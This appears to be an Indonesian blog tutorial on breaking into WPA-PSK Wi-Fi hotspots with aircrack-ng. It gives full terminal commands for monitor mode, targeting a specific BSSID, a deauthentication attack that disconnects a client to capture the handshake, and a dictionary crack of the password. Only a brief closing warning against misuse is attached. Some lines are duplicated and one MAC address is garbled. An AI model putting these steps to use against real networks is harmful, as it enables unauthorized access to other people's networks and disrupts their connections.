Pada
Artikel Kali ini, saya akan mencoba sedikit memberi
penjelasan bagaimana sih cara membobol password hotspot yang bertipe
wpa-psk dengan mudah.
Cara
ini bisa menggunakan linux backtrack 5 dinal release atau linux
apapun pertama asal sudah terinstall aplikasi aircrack-ng. Mari
simak artikel berikut.
Pertama,
siapkan CD Live Backtrack atau bisa make linux ubuntu dengan
menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk
menginstall aircrack-ng di linux ubuntu
1. Ketikkan perintah berikut di terminal :
-# apt-get install aircrack-ng
Kedua,
masuk ke dekstop dengan perintah ~# startx (untuk yang make
backtrack)
Ketiga,
buka konsole (terminal) dan ketikkan perintah untuk melihat interface
device yang ada
Login Root dulu,
-# sudo su
Berikutnya, Lihat informasi semua IP yang terhubung ke kalian, ketikkan perintah :
-# ifconfig -a
Selanjutnya,
ketikkan perintah di bawah ini untuk mengaktifkan interface wlan0 :
-# ifconfig wlan0 up
Berikutnya, gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual
interface mode
monitor
dengan mengetikkan perintah di bawah :
-# airmon-ng start wlan0
Selanjutnya, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
-# airodump-ng mon0
cat
: mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh,
fokuskan monitoring jaringan hotspot yang ingin kita bobol
passwordnya. Ketik lagi perintah berikut.
-# airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
ket:
memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55
pada channel 11 dan hasil dari monitoring di tulis pada file yang
bernama ‘coba’
Selanjutnya,
gunakan serangan dengan cara disconnect salah satu client untuk
mendapatkan paket handshake yang dibutuhkan untuk proses cracking, ketikkan perintah :
-# aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
ket:
aireplay-ng digunakan untuk mendisconnect salah satu client yaitu
00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan
untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir,
setelah mendapatkan paket handshake, selanjutnya adalah proses
cracking dengan menggunakan aircrack dan file password dengan
existensi .lst atau .txt dengan perintah :
-# aircrack-ng coba*.cap -w /pentest/passwords/wordlists/pass.txt
ket
:pass.txt adalah file password yang Admin buat sendiri dan terletak
pada /pentest/passwords/wordlists/pass.txt
Tapi
Yang Patut Di ingat . Keberhasilan dari cara diatas tergantung sama
kemampuan sobat membuat password nya .. misal nya :
Admin
123
adminpass.
DLL
Peringatan,
Pakailah cara diatas untuk kebaikan atau hal hal yang bermanfaat.
Dilarang keras untuk melakukannya untuk Kejahatan atau merugikan orang lain.
Pakailah cara diatas untuk kebaikan atau hal hal yang bermanfaat.
Dilarang keras untuk melakukannya untuk Kejahatan atau merugikan orang lain.
Sekian,
Tidak ada komentar:
Posting Komentar